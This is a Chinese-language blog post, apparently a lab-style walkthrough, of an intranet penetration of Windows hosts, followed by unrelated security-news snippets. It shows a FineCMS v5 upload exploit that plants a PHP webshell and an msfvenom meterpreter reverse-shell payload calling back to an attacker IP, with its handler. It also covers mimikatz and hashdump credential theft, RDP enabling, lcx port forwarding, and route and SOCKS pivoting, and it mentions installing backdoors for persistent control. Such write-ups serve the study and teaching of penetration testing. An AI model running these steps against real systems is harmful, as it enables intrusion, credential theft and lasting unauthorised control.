内网渗透-windows系统

一颗小胡椒2022-04-08 22:47:48

前言

  • 本次内网渗透的思路为:通过攻击外网服务器,从而获取外网服务器的权限,然后利用入侵成功的外网服务器作为跳板来攻击内网其他服务器,最后获得敏感数据(系统密码等),看情况安装后门木马或者后门软件,实现长期控制和获得敏感数据的方式。
  • 还有一种内网渗透的思路为:通过社工等方法攻击企业办公网的电脑、办公网无线等,实现控制办公电脑,再用获得的办公网数据。
  • 一、利用FineCMS v5 的文件上传漏洞,获取官网系统的Webshell
  • 渗透过程详解
  • 本次渗透过程将分为webshell—->getshell—->提权—->横向渗透


webshell访问某网站,该网站利用的是FineCMS v5系统建站,创建一个新的用户进行测试。

初步判断该网页模板为finecms v5建站系统,然后注册一个新的用户,方便我们利用finecms v5系统的文件上传漏洞

参考链接:

https://blog.csdn.net/dfdhxb995397/article/details/101384946

文件上传漏洞在会员头像处,所以先注册一个账号然后登录后上传我们的一句话木马

最开始的文件格式是0x0.png

通过burp代理拦截将tx后面的image/png换成image/php即可

输入参数v=phpinfo();验证成功

验证上传成功后,打开菜刀软件输入上传的网站路径和参数(一句话木马的密码),可以连接服务器

在菜刀软件上可以进行数据库的提权,如mof提权、udf提权、启动项提权等

  • 二、获取Win2008的远程桌面权限,并登陆administrator账号
  • 编写免杀木马
  • 通过webshell连接目标服务器,但是访问的数据有限,仅仅是站点的系统账户权限,访问的系统路径也有限,于是我们可以编写免杀木马来进行反弹shell木马su.exe
Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe >/root/Desktop/su.exe

利用刚刚连接菜刀的操作,在文件管理中上传我们需要的工具

进入meterpreter攻击模块,配置参数

  • use exploit/multi/handler
  • Set payload/windows/x64/meterpreter/reverse_tcp
  • Set lport 4444
  • Set lhost 192.168.10.130
  • run

可以利用菜刀的虚拟终端模拟win2008服务器点击免杀木马的操作,让木马生效

run执行监听

  • 获取密码过程
  • hashdump
  • load mimikatz
  • kerberos

注:如果win2008的远程桌面操作是不允许连接到这台计算机,那么开启端口转发也是没用的

开启远程桌面

run getgui -e

思路一:利用meterpreter模块执行远程连接

然后开启端口转发,-l(本地端口)-p(远程控制端口)-r(目标主机)

靶机3389端口转发发送到本地的5555端口

Rdesktop -u 用户名 -p 密码 127.0.0.1:5555 连接本地的5555端口开启远程桌面

利用windows开启远程桌面,需要利用lcx工具,现在shell模式下输入指令

靶机执行lcx.exe -slave 192.168.10.20 5555 192.168.10.10 3389

思路二:利用lcx工具执行远程连接

攻击机执行lcx.exe. -listen 5555 33891,接着打开mstsc连接127.0.0.1 :33891

以下为连接成功和监听数据的发送

三、获取内网Win7的远程桌面权限,并登陆到ndsec账号

在获取win2008服务器的meterpreter的基础上

添加路由条目到10.10.10.0网段(run autoroute -s 10.10.10.0/24)

扫描10.10.10.0/24网段下可能存在漏洞的主机,发现我们需要攻击的主机10.10.10.102(此操作需要在刚刚的meterpreter添加路由条目之后,不然会到达不了目标主机)

尝试看看有没有Ms17-010漏洞,发现利用不成功,执行不起来

没有shell这里就就没有用端口转发,做的是反向代理

在攻击机执行

ew.exe -s rcsocks -l 1080 -e 8888

在win2008shell下执行

ew -s rssocks -d 192.168.10.20 -e 8888

代理建立成功

接着用sockscap64工具添加ip和端口(反向代理)

连接内网主机10.10.10.101

输入密码ndsec登录

总结

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

软件windows系统
本作品采用《CC 协议》,转载必须注明作者和本文链接
根据Statista 的数据显示,智能手机用户数量已超过65亿,预计到2025年将增长到 76 亿。截至2022年8月,Android在移动操作系统中占据了70%的市场份额。根据Statista的数据,针对Android应用程序中不同形式恶意软件,木马占93.93%,勒索软件占所有恶意软件渗透的2.47%。代码签名证书可防止应用程序未经授权访问,不给恶意软件攻击者留下任何空间。为了保护 Android 应用程序免受恶意软件的侵害,开发人员应考虑使用代码签名证书。截至2022年6月,Google Play商店有超过268万Android应用。
卡巴斯基实验室的研究人员详细介绍了一个名为 Luna 的新勒索软件系列,它是用 Rust 编写的,能够针对 Windows、Linux 和 ESXi 系统。 Luna 勒索软件是第三个用 Rust 语言编写的勒索软件系列,其他恶意软件品种是BlackCat和Hive。
McAfee 解决了其适用于 Windows 的 McAfee Agent 软件中的一个安全漏洞,该漏洞允许使用 SYSTEM 权限运行任意代码。
RansomEXX 勒索软件运营商攻击了意大利奢侈时尚品牌 Ermenegildo Zegna Holding,并开始泄露被盗文件。
近期,Unit 42的研究人员在分析Medusa(美杜莎)勒索软件活动时,发现该活动的升级和勒索策略发生了很大变化。
该公司已经修补了被跟踪为CVE-2022-0166的高严重性本地权限提升 (LPE) 漏洞,该漏洞由CERT/CC漏洞分析师Will Dormann发现,并于1月18日发布了McAfee Agent 5.7.5的安全更新。 McAfee Agent 5.7.5之前的所有McAfee Agent版本都容易受到攻击,并允许非特权攻击者使用NT AUTHORITY\SYSTEM账户权限运行代码,这是W
微软补丁日,有一个漏洞CVSS评分9.8
2021年底公开暴露的 Log4j 漏洞迅速成为该年影响力最大的安全威胁。然而,这并不是企业安全团队面临的唯一难题,据身份盗窃资源中心( ITRC )的数据显示,仅 2021 年前三季度公开报告的数据泄露事件就多达 1,291 起;Redscan 对美国国家通用漏洞数据库( NVD )的一项新调研显示, 2021 年披露的漏洞数量( 18,439 个)比以往任何一年都多。更糟糕的是,其中绝大部分都
Log4j 漏洞、Colonial Pipeline攻击、Kaseya事件等是2021年影响较大网络安全事件。
一颗小胡椒
暂无描述